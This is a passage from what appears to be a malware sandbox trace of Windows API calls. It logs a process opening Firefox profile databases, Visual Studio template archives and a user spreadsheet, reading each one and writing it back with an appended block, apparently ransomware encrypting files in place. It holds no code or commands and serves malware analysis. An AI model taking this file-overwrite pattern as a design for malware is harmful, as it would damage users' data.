lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0189.676] ReadFile (in: hFile=0x214, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x17c, lpOverlapped=0x0) returned 1 [0189.677] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.677] WriteFile (in: hFile=0x214, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x704, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x704, lpOverlapped=0x0) returned 1 [0189.678] CloseHandle (hObject=0x214) returned 1 [0189.678] GetCurrentThreadId () returned 0x8bc [0189.678] GetCurrentThreadId () returned 0x8bc [0189.678] GetCurrentThreadId () returned 0x8bc [0189.678] SetEvent (hEvent=0xc4) returned 1 [0189.678] RtlExitUserThread (Status=0x0) Thread: id = 15 os_tid = 0x8ec [0060.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.793] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.793] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4000 [0060.794] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.794] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.794] ReleaseMutex (hMutex=0x168) returned 1 [0060.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="secmod.db", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="secmod.db", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="secmod.db", lpUsedDefaultChar=0x0) returned 9 [0060.794] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0060.796] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3000 [0060.797] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0060.797] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3000 [0060.797] WriteFile (in: hFile=0x1c4, lpBuffer=0x1ec4598*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec4598*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.797] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0060.797] WriteFile (in: hFile=0x1c4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.798] CloseHandle (hObject=0x1c4) returned 1 [0060.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.805] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.805] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa0000 [0060.805] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.805] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.805] ReleaseMutex (hMutex=0x168) returned 1 [0060.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="818200132aebmoouht.sqlite", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0060.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="818200132aebmoouht.sqlite", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="818200132aebmoouht.sqlite", lpUsedDefaultChar=0x0) returned 25 [0060.805] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0060.808] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0060.809] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9f000 [0060.809] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0060.812] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9f000 [0060.812] WriteFile (in: hFile=0x1c4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.813] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0060.813] WriteFile (in: hFile=0x1c4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0060.813] WriteFile (in: hFile=0x1c4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.813] CloseHandle (hObject=0x1c4) returned 1 [0060.941] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.941] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.942] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x251 [0060.942] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0060.942] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.942] ReleaseMutex (hMutex=0x168) returned 1 [0060.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfig.zip", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfig.zip", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppConfig.zip", lpUsedDefaultChar=0x0) returned 13 [0060.942] ReadFile (in: hFile=0x1c4, lpBuffer=0x1f64798, nNumberOfBytesToRead=0x251, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64798*, lpNumberOfBytesRead=0x2fdf2bc*=0x251, lpOverlapped=0x0) returned 1 [0060.954] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0060.954] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0x7d9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2fdf2d0*=0x7d9, lpOverlapped=0x0) returned 1 [0060.954] CloseHandle (hObject=0x1c4) returned 1 [0061.002] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0061.003] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.003] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x585 [0061.003] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.004] ReleaseMutex (hMutex=0x168) returned 1 [0061.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Form.zip", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0061.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Form.zip", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Form.zip", lpUsedDefaultChar=0x0) returned 8 [0061.004] ReadFile (in: hFile=0x1bc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x585, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x585, lpOverlapped=0x0) returned 1 [0061.024] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0061.024] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec5568*, nNumberOfBytesToWrite=0xb0d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesWritten=0x2fdf2d0*=0xb0d, lpOverlapped=0x0) returned 1 [0061.024] CloseHandle (hObject=0x1bc) returned 1 [0061.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0061.026] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.026] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x59c [0061.026] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.026] ReleaseMutex (hMutex=0x168) returned 1 [0061.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserControl.zip", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0061.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserControl.zip", cchWideChar=15, lpMultiByteStr=0x1f7328c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserControl.zip", lpUsedDefaultChar=0x0) returned 15 [0061.026] ReadFile (in: hFile=0x1bc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x59c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x59c, lpOverlapped=0x0) returned 1 [0061.074] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0061.074] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb24, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xb24, lpOverlapped=0x0) returned 1 [0061.075] CloseHandle (hObject=0x1bc) returned 1 [0061.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0061.076] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.076] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x35b [0061.077] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.077] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.077] ReleaseMutex (hMutex=0x168) returned 1 [0061.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EmptyDatabase.zip", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0061.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EmptyDatabase.zip", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EmptyDatabase.zip", lpUsedDefaultChar=0x0) returned 17 [0061.077] ReadFile (in: hFile=0x1bc, lpBuffer=0x26b2028, nNumberOfBytesToRead=0x35b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b2028*, lpNumberOfBytesRead=0x2fdf2bc*=0x35b, lpOverlapped=0x0) returned 1 [0061.098] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0061.098] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0x8e3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2fdf2d0*=0x8e3, lpOverlapped=0x0) returned 1 [0061.099] CloseHandle (hObject=0x1bc) returned 1 [0061.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0061.107] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.107] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xec16 [0061.107] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0061.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.107] ReleaseMutex (hMutex=0x168) returned 1 [0061.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.zip", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0061.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.zip", cchWideChar=16, lpMultiByteStr=0x1f88ba4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SplashScreen.zip", lpUsedDefaultChar=0x0) returned 16 [0061.107] ReadFile (in: hFile=0x1bc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0061.717] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xdc16 [0061.717] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.067] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xdc16 [0062.068] WriteFile (in: hFile=0x1bc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.069] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.069] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.069] CloseHandle (hObject=0x1bc) returned 1 [0062.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GsChAk3eag4bUKbjR_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gschak3eag4bukbjr_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.073] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.073] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x16cc4 [0062.073] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.073] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.073] ReleaseMutex (hMutex=0x168) returned 1 [0062.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GsChAk3eag4bUKbjR_.xlsx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0062.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GsChAk3eag4bUKbjR_.xlsx", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GsChAk3eag4bUKbjR_.xlsx", lpUsedDefaultChar=0x0) returned 23 [0062.073] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.075] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15cc4 [0062.075] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.075] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x15cc4 [0062.075] WriteFile (in: hFile=0x1bc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.076] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.076] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, 